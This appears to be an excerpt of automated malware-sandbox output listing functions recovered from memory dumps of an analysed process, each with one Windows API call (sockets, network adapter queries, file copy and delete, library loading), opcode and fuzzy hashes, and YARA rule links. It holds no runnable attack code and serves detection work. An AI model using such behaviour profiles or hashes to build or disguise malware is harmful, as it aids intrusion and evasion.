                                                                                              • API ID: setsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 3981526788-0
                                                                                              • Opcode ID: 8c8c71272a14426c1cab09e6fc2d9b41844c862e79b5b4cbb85c8a3af9ed08c9
                                                                                              • Instruction ID: 6715c23a6a952acfa72cb7a3b515dc95f3dc376381933a0249dddb69ec9b0bcb
                                                                                              • Opcode Fuzzy Hash: 8c8c71272a14426c1cab09e6fc2d9b41844c862e79b5b4cbb85c8a3af9ed08c9
                                                                                              • Instruction Fuzzy Hash: BE11C471900204AFEB21DF55DC84F56FBA8EF44310F0484AAFA459B241D774A418DBB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD4B7A, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNEL32(?,?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD4BDB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 7ab4c15242648787677e8a1ba5c2b8eff97dce2d1b5b1a1a05492476e8b6f241
                                                                                              • Instruction ID: c9aa8da23f59238d9eeeae0a62e4a6a9fcaea59dff3e888914ae7e1592d7f1dc
                                                                                              • Opcode Fuzzy Hash: 7ab4c15242648787677e8a1ba5c2b8eff97dce2d1b5b1a1a05492476e8b6f241
                                                                                              • Instruction Fuzzy Hash: 191190715083849FDB11CF25DC84B52BFA8EF06220F0884EAEC85CF252E274A849CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACB04B, Relevance: 1.6, APIs: 1, Instructions: 59networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: recv
                                                                                              • String ID:
                                                                                              • API String ID: 1507349165-0
                                                                                              • Opcode ID: b6599b3b0d08aeb9a4d99d60c700aed11556bad8241c050ed81f4745b8262425
                                                                                              • Instruction ID: 11d9ad9c51cd02d8488f1313fc74f15b79a1f73a415094eb63f7dc783cd0c178
                                                                                              • Opcode Fuzzy Hash: b6599b3b0d08aeb9a4d99d60c700aed11556bad8241c050ed81f4745b8262425
                                                                                              • Instruction Fuzzy Hash: E52190714093C09FDB22CF21DC85A52BFB4EF06220F0984EFE9858F163D2659809CB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD6A06, Relevance: 1.6, APIs: 1, Instructions: 59encryptionCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD6A62
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CertCertificateChainPolicyVerify
                                                                                              • String ID:
                                                                                              • API String ID: 3930008701-0
                                                                                              • Opcode ID: 5a1779db285cbc154210c1f57e84f704f2ee661a7cd63fc9bd91bb475756c7ff
                                                                                              • Instruction ID: d89fa3957d6c1b6b96ac18b1ca79643284d706e15644b02f9fe98f8b06f3a5f9
                                                                                              • Opcode Fuzzy Hash: 5a1779db285cbc154210c1f57e84f704f2ee661a7cd63fc9bd91bb475756c7ff
                                                                                              • Instruction Fuzzy Hash: E611E3B1500204AFEB20CF55DC84F66FBA8EF44320F14C4AAEE899B241E774B419DB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD027A, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetIfEntry.IPHLPAPI(?,00000E80,?,?), ref: 04BD02F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Entry
                                                                                              • String ID:
                                                                                              • API String ID: 3940594292-0
                                                                                              • Opcode ID: b716eb13ac0d36fc140a1b958313bf42114f12b500f3e03dad4c416a00e7df34
                                                                                              • Instruction ID: 2641614b0e4b7e49d21a2d7adb8ac6014ab5ec0aa53f99f77f3babbc64a35838
                                                                                              • Opcode Fuzzy Hash: b716eb13ac0d36fc140a1b958313bf42114f12b500f3e03dad4c416a00e7df34
                                                                                              • Instruction Fuzzy Hash: A61108714083806FD711CB16CC45F26FFB4EF86720F08818EEC484B282E625B809CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD55B9, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DispatchMessageW.USER32(?), ref: 04BD5624
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatchMessage
                                                                                              • String ID:
                                                                                              • API String ID: 2061451462-0
                                                                                              • Opcode ID: 0f6fba25545c869b1c81edc9933f3276e6eda476d5fbd2af221e7ba305ea2da7
                                                                                              • Instruction ID: c355fece7718cbe63c500aec914cd1fd8fbe6ea1d86d14c1b0f46f58f893468f
                                                                                              • Opcode Fuzzy Hash: 0f6fba25545c869b1c81edc9933f3276e6eda476d5fbd2af221e7ba305ea2da7
                                                                                              • Instruction Fuzzy Hash: 05114F754093C4AFDB128F25DC44B61BFB4EF47624F0980DAED854F253E2656948CB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD1136, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ioctlsocket.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD118F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ioctlsocket
                                                                                              • String ID:
                                                                                              • API String ID: 3577187118-0
                                                                                              • Opcode ID: fd2a69e4e9729529c2b8f27e1ece077a2a654504049796607daba245ee918778
                                                                                              • Instruction ID: 84b3f3c69d64419c8d38976b285670d2cd1295088f9d60e64cb7d079544c00cc
                                                                                              • Opcode Fuzzy Hash: fd2a69e4e9729529c2b8f27e1ece077a2a654504049796607daba245ee918778
                                                                                              • Instruction Fuzzy Hash: 6211A3B1904204AFEB21CF59DC84B66FBA8EF44320F14C4AAEE499B242E774A4158B75
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACA330, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindCloseChangeNotification.KERNEL32(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 00ACA384
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseFindNotification
                                                                                              • String ID:
                                                                                              • API String ID: 2591292051-0
                                                                                              • Opcode ID: 2124ff0295442f0909e54ac482856a5b98fa378b42226eff425d4cab8174d730
                                                                                              • Instruction ID: 04127bfef2074f8e6c27c9a5c1b56d75ef5ac6696db3240184449abaa4717ffe
                                                                                              • Opcode Fuzzy Hash: 2124ff0295442f0909e54ac482856a5b98fa378b42226eff425d4cab8174d730
                                                                                              • Instruction Fuzzy Hash: 5211A7755093C49FDB128F25DC54B52BFB4EF12224F0884EAED858F653D2759808CB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD3296, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetAdaptersAddresses.IPHLPAPI(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD32F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AdaptersAddresses
                                                                                              • String ID:
                                                                                              • API String ID: 2506852604-0
                                                                                              • Opcode ID: 6c911166f8f4de348ec4e4650e90810bf1e1db7f7984aaf0291e136353081844
                                                                                              • Instruction ID: 033c54f7939fc07f5ba4982c3f359df1f9d3d4d96af1188ae747053d4ccc6cc1
                                                                                              • Opcode Fuzzy Hash: 6c911166f8f4de348ec4e4650e90810bf1e1db7f7984aaf0291e136353081844
                                                                                              • Instruction Fuzzy Hash: 2111C271500204AFEB218F55DD85F66FFE8EF44720F0484AAEE455B252E775B408DBB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD4112, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(?,00000E80), ref: 04BD417B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: a4be8b35a53b87266d417ea37038e390b5f8de7d38d07647a97dbe229332c37e
                                                                                              • Instruction ID: e599f84d139ce6e41a8b731048a7d708449f269cf0e8b17abebcf21a7f0d1327
                                                                                              • Opcode Fuzzy Hash: a4be8b35a53b87266d417ea37038e390b5f8de7d38d07647a97dbe229332c37e
                                                                                              • Instruction Fuzzy Hash: B611E571500204AFFB209F15DC85B66FFA8DF44720F14C499EE455A281E6B4B5498AB5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD53B8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD541C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: 24ae5d32614ace058184b0848ae2fc104d01b9b40415ad60a2b1f8d1137cbdcf
                                                                                              • Instruction ID: bccb9914999f863a5cf817f57208077a3d5f88bafd686938a153371e1c9e2858
                                                                                              • Opcode Fuzzy Hash: 24ae5d32614ace058184b0848ae2fc104d01b9b40415ad60a2b1f8d1137cbdcf
                                                                                              • Instruction Fuzzy Hash: 3011A7715093C4AFDB228F25DC54B52BFB4EF02214F08C4DAEDC58F252D265A949CB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACA8FB, Relevance: 1.6, APIs: 1, Instructions: 54comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: 83e8b3886529e1899c76e02481246ab944b960c667a90989e65b2cd592db704c
                                                                                              • Instruction ID: 46deae0cc641fd60cfe0b4396bf0edf59589d34a943a057cd30c68abc092a842
                                                                                              • Opcode Fuzzy Hash: 83e8b3886529e1899c76e02481246ab944b960c667a90989e65b2cd592db704c
                                                                                              • Instruction Fuzzy Hash: 43118F71409384AFDB128F15DC45B52BFB4EF16224F0984EAED898F253D279A849CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD3876, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RasConnectionNotificationW.RASAPI32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD38CF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ConnectionNotification
                                                                                              • String ID:
                                                                                              • API String ID: 1402429939-0
                                                                                              • Opcode ID: 3a6db0190ea7af416ab6be82b988553d14948d34bc9c0e15daedd7893a20b091
                                                                                              • Instruction ID: 8d7e8bb03d4b004a653b7d4205f4889582b16fbcd5286f2e536bdfddbd550871
                                                                                              • Opcode Fuzzy Hash: 3a6db0190ea7af416ab6be82b988553d14948d34bc9c0e15daedd7893a20b091
                                                                                              • Instruction Fuzzy Hash: 7211E5B1500304AFEB208F15DC85F66FBA8EF44720F0884AAEE455B241E775B404DB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD338E, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetPerAdapterInfo.IPHLPAPI(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD33E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AdapterInfo
                                                                                              • String ID:
                                                                                              • API String ID: 3405139893-0
                                                                                              • Opcode ID: 3a6db0190ea7af416ab6be82b988553d14948d34bc9c0e15daedd7893a20b091
                                                                                              • Instruction ID: 2b606b448f461b468486c61dae8f3dc2971035ff64fb7ba49cbf8aa79ecec89d
                                                                                              • Opcode Fuzzy Hash: 3a6db0190ea7af416ab6be82b988553d14948d34bc9c0e15daedd7893a20b091
                                                                                              • Instruction Fuzzy Hash: 221108B1504204AFEB218F55DC85F66FBE8EF44320F04C4AAEE455B242E775B404DBB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD1574, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MapViewOfFile.KERNEL32(?,?,?,?,?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD15D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID:
                                                                                              • API String ID: 3314676101-0
                                                                                              • Opcode ID: c118d4705a1ecc2d3f96627fcc7481eeafd0197cf497753fd13fff319d9d9c24
                                                                                              • Instruction ID: 1efd533eb47f5965062479f9c833704c308eb19634081dbcb91c8746bac19029
                                                                                              • Opcode Fuzzy Hash: c118d4705a1ecc2d3f96627fcc7481eeafd0197cf497753fd13fff319d9d9c24
                                                                                              • Instruction Fuzzy Hash: 0E11BF71409384AFDB22CF55DC44B52FFB4EF06220F0888EAED898F162D375A418CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD28F3, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,?,?,?), ref: 04BD2955
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 4771d35dca3e406998882a42dfb8391da883efd9dd40a4adfc68741d4d655457
                                                                                              • Instruction ID: 03bf6f3bc8c03e71d8146353341a31f9ce8e64fbde6569e30d976e3cfee15511
                                                                                              • Opcode Fuzzy Hash: 4771d35dca3e406998882a42dfb8391da883efd9dd40a4adfc68741d4d655457
                                                                                              • Instruction Fuzzy Hash: 3411A0714093C4AFDB228F25DC44B52FFB4EF16220F08C5DEED894B663D265A819DB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD30E2, Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetNetworkParams.IPHLPAPI(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD3138
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: NetworkParams
                                                                                              • String ID:
                                                                                              • API String ID: 2134775280-0
                                                                                              • Opcode ID: 63f4f81eac0d6ee4f1732f2a5598f58719ceade4c0d4fc90eb40870c1535f59f
                                                                                              • Instruction ID: 65050c1118a2b482ef00a424fcad8e54a89ab1ebe440691b209107a5f307228e
                                                                                              • Opcode Fuzzy Hash: 63f4f81eac0d6ee4f1732f2a5598f58719ceade4c0d4fc90eb40870c1535f59f
                                                                                              • Instruction Fuzzy Hash: 20010471500204AEEB209F59DC84B66FBE8EF44720F1484DAEE459B242E674B4448AB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD504A, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CopyFileW.KERNEL32(?,?,?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD5092
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CopyFile
                                                                                              • String ID:
                                                                                              • API String ID: 1304948518-0
                                                                                              • Opcode ID: cba685423e6ac02a49f9aef3f12f7d05dc8bab01c3f7e8732ee1693e0022d8f4
                                                                                              • Instruction ID: e8458693481cbafa596d63528abe76953e7bea4ed4fd0e116de45cadd1b969a9
                                                                                              • Opcode Fuzzy Hash: cba685423e6ac02a49f9aef3f12f7d05dc8bab01c3f7e8732ee1693e0022d8f4
                                                                                              • Instruction Fuzzy Hash: B91152756002409FDB20DF29D845B56FBE8EF04210F08C4EADD59CB642E675E444CBB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACBE96, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileType.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 00ACBEE9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              • Opcode ID: 5b177b3c37d744e466bb62bf559b924002805687ffcc2cf2c76522ade7899caa
                                                                                              • Instruction ID: d24e577064888b12961affe9c48ba122b9880a2a6b095fa31e715529fbd96f4c
                                                                                              • Opcode Fuzzy Hash: 5b177b3c37d744e466bb62bf559b924002805687ffcc2cf2c76522ade7899caa
                                                                                              • Instruction Fuzzy Hash: 7401F5B1514204AFEB20CF19DC85FA6FBA8EF44720F14C49AEE459F241D775E408DAB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD2596, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ClassInfo
                                                                                              • String ID:
                                                                                              • API String ID: 3534257612-0
                                                                                              • Opcode ID: 03e86c77157717dbf800441151ab28ec188493dc63cacf307b911e6ef6ea9ada
                                                                                              • Instruction ID: a61c9e752ec86bdf94aa5b0cb4c1c8d4dd798877dc2257fcc872492d1a3f42e7
                                                                                              • Opcode Fuzzy Hash: 03e86c77157717dbf800441151ab28ec188493dc63cacf307b911e6ef6ea9ada
                                                                                              • Instruction Fuzzy Hash: C2016D756002448FEB24CE19D884B66FBE8EF44720F08C0EAED498B251E661E448DB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD3F92, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 04BD3FDE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Connect
                                                                                              • String ID:
                                                                                              • API String ID: 3144859779-0
                                                                                              • Opcode ID: 52bacde8713c628b715e3887a996126ad1cebd9b8eafb0c90d3887f708887576
                                                                                              • Instruction ID: 89d8109f29a2e1ae8e5c4877328077ba01dffc759dacbe58dca01a4e32e7e17f
                                                                                              • Opcode Fuzzy Hash: 52bacde8713c628b715e3887a996126ad1cebd9b8eafb0c90d3887f708887576
                                                                                              • Instruction Fuzzy Hash: 32115A765002049FDB20CF55D884B56FBF4EF44310F0888AAED898B652E371E418DB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACAA6C, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,?,?), ref: 00ACAAC6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              • Opcode ID: 1286cb82e626e073e069ac7d5b3d6c8d34b7f708e6dd3890ce8a7e43216ef172
                                                                                              • Instruction ID: ab4a9365769905e26672952625cd3e100f1025a2a22612b939b60acf9b373fd6
                                                                                              • Opcode Fuzzy Hash: 1286cb82e626e073e069ac7d5b3d6c8d34b7f708e6dd3890ce8a7e43216ef172
                                                                                              • Instruction Fuzzy Hash: 271182314097849FDB218F15DC84B52FFB4EF16320F09C4DAED854B262D275A859CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD4B9E, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNEL32(?,?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD4BDB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: f05f760286f202782688da0f344152788fd93a3e5957ad3bcd879fe7655ba542
                                                                                              • Instruction ID: 9f2c5fc5e73cd06184a33ec496eb5a7cfba4cb7a4ede7016490b2f38091a557f
                                                                                              • Opcode Fuzzy Hash: f05f760286f202782688da0f344152788fd93a3e5957ad3bcd879fe7655ba542
                                                                                              • Instruction Fuzzy Hash: 71015E75A002449FEB10CF29DC85766FBE8EF44221F08C5EAED49DB246E675E444CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACA2AE, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • gethostname.WS2_32(?,00000E80,?,?), ref: 00ACA2FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: gethostname
                                                                                              • String ID:
                                                                                              • API String ID: 144339138-0
                                                                                              • Opcode ID: d1691a71e8cb6fc67f2418a93e8c2157aac69172cddd9824c57f8e37319259c9
                                                                                              • Instruction ID: fa786fad4e8f4adc8beaa4cf3d1cb027ca1c504ac88e7df73e4ca24dbef1d2a5
                                                                                              • Opcode Fuzzy Hash: d1691a71e8cb6fc67f2418a93e8c2157aac69172cddd9824c57f8e37319259c9
                                                                                              • Instruction Fuzzy Hash: 9801B171900200ABD710DF1ADC85B26FBE8FB84A20F14856AED088B645E635F515CBE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD14EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileMappingW.KERNELBASE(?,00000E80,?,?), ref: 04BD153E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateFileMapping
                                                                                              • String ID:
                                                                                              • API String ID: 524692379-0
                                                                                              • Opcode ID: 7cd9ebd87a1e6d2d4b244863fb79a68605c2c7ea5b165e67fddc7b5ca511e2dc
                                                                                              • Instruction ID: 74dfccde51d12a64dca767e95712cfccd27ce8fcd028f8b80ba1d9c391ce57e8
                                                                                              • Opcode Fuzzy Hash: 7cd9ebd87a1e6d2d4b244863fb79a68605c2c7ea5b165e67fddc7b5ca511e2dc
                                                                                              • Instruction Fuzzy Hash: 1401B172900200ABD710DF1ADC85B26FBE8FB84B20F14852AED098B645E631F515CBE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD37CE, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FormatMessageW.KERNEL32(?,00000E80,?,?), ref: 04BD381E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FormatMessage
                                                                                              • String ID:
                                                                                              • API String ID: 1306739567-0
                                                                                              • Opcode ID: 525dff4caf3e7c8338f4f0a96ca65dc4ddefe16840e1e3d7ec66d098112838c4
                                                                                              • Instruction ID: 90555b8d9ceca531242c753fc31522554762ea752bb50c4b994f72930ccd4ff4
                                                                                              • Opcode Fuzzy Hash: 525dff4caf3e7c8338f4f0a96ca65dc4ddefe16840e1e3d7ec66d098112838c4
                                                                                              • Instruction Fuzzy Hash: 0701B172900200ABD710DF1ADC85B26FBE8FB84B20F14852AED098B645E631F515CBE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD531A, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,00000E80,?,?), ref: 04BD536A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileModuleName
                                                                                              • String ID:
                                                                                              • API String ID: 514040917-0
                                                                                              • Opcode ID: 273ff12ffb13b20dc2482df96f849ca040eaebbcd541695ab7fcbd7ee66cc67c
                                                                                              • Instruction ID: b6892b2e443e703e36fde2233a5d2a3ed1a6fa1ad1020ec4f9207224a2425f51
                                                                                              • Opcode Fuzzy Hash: 273ff12ffb13b20dc2482df96f849ca040eaebbcd541695ab7fcbd7ee66cc67c
                                                                                              • Instruction Fuzzy Hash: 7301B172900200ABD710DF1ADC85B26FBE8FB84B20F14852AED088B645E631F515CBE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD2F56, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD2F90
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              • Opcode ID: 2925c5475741b3dbdfb19e1c50b1d633bdd049ee59672c7f545874a0378eaca1
                                                                                              • Instruction ID: 2cce665d7471d64ae32b2170cc31608a12707b035797def9fb62a6d6520f068f
                                                                                              • Opcode Fuzzy Hash: 2925c5475741b3dbdfb19e1c50b1d633bdd049ee59672c7f545874a0378eaca1
